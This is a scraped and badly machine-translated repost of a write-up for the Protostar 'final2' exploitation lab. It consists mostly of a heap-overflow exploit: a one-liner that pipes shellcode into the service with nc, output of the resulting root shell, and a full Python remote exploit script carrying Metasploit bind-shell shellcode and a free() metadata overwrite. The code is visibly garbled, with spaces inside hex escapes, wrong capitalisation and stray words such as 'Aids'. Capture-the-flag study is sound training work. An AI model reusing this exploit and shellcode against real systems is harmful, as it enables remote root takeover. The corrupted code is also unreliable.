Protostar final2 01/24 Update SLTechnology News&Howtos

Protostar final2

2025-01-24 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Network Security >

Shulou(Shulou.com)06/01 Report--

Core files will be in / tmp.'\ x10\ xd4\ x04\ x08' +'\ x98\ xe0\ x04\ x08'] is as follows: user@protostar:/opt/protostar/bin$ python-c "print 'FSRD'+'A'*123+'/' +' FSRD'+'ROOT'+'\ x90" 44 +'\ x31\ xc0\ x50\ x68\ x6e\ x6e\ x63\ x68\ x2f\ x62\ x69\ x89\ x50\ x68\ x36\ x36 X68\ x2d\ x6c\ x74\ x89\ xe2\ x50\ x68\ x6e\ x2f\ x73\ x68\ x68\ x62\ x69\ x66\ x68\ x2d\ x65\ x89\ xe1\ x51\ x52\ x53\ x89\ xb0\ x89\ xf1\ X31\ xd2\ xcd\ x80' +'/ +'\ xf8\ xff\ xff\ xfc\ xff\ xff\ xff'+'\ X10\ xd4\ x04\ x082b\ x98\ xe0\ X04\ x08' "| nc 127.0.0.1 2993 |

Process OK remote connection Test: d:\ > nc 192.168.0.71 6666

Uid=0 (root) gid=0 (root) groups=0 (root)

Whoami

Root

ExitOK! Similarly, write a remote EXP,Python script as follows: #! / usr/bin/env python

From socket import *

From struct import *

From optparse import OptionParser

Def exploit (host, port):

# linux/x86/shell_bind_tcp-78 bytes

# http://www.metasploit.com

# VERBOSE=false, LPORT=4444, RHOST=, PrependSetresuid=false

# PrependSetreuid=false, PrependSetuid=false

# PrependChrootBreak=false, AppendExit=false

# InitialAutoRunScript=, AutoRunScript=

Shellcode = "\ x31\ xdb\ xf7\ xe3\ x53\ x43\ x53\ x6a\ x02\ x89\ xe1\ xb0\ x66\ xcd\ x80"\

"\ x5b\ x5e\ x52\ x68\ xff\ x02\ x11\ x5c\ x6a\ x10\ x51\ x50\ x89\ xe1\ x6a"\

"\ x66\ x58\ xcd\ x80\ x89\ x41\ x04\ xb3\ x04\ xb0\ x66\ xcd\ x80\ x43\ xb0"\

"\ x66\ xcd\ x80\ x93\ x59\ x6a\ x3f\ x58\ xcd\ x80\ x49\ x79\ xf8\ x68\ x2f"\

"\ x2f\ x73\ x68\ x68\ x2f\ x62\ x69\ x6e\ x89\ xe3\ x50\ x53\ x89\ xe1\ xb0"\

"\ x0b\ xcd\ x80"

# Open the connection

S = socket (AF_INET, SOCK_STREAM)

S.connect ((host, port))

Req_size = 128,

HDR = 'FSRD'

NOP ='\ x90'

Free_payload ='/'+'\ xf8\ xff\ xff\ xff' +'\ xfc\ xff\ xff\ xff'

Free_payload + ='\ x10\ xd4\ x04\ x08' +'\ x98\ xe0\ x04\ x08'

First_req = HDR + 'Aids * (req_size-len (HDR)-1) +' /'

Second_req = HDR + 'ROOT'

Second_req + = NOP * (req_size-len (HDR)-4-len (shellcode)-len (free_payload))

Second_req + = shellcode

Second_req + = free_payload

S.send (first_req+second_req)

S.close

Print ("[*] Exploit successfull! Now launch: nc" + str (host) + "4444")

If _ name__ = = "_ _ main__":

Parser = OptionParser ("usage:% prog [options]")

Parser.add_option ("- H", "- host", dest= "hostname", default= "127.0.0.1", type= "string", help= "Target to exploit")

Parser.add_option ("- p", "--port", dest= "portnum", default=2993, type= "int", help= "Target port")

(options, args) = parser.parse_args ()

Exploit (options.hostname, options.portnum)

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.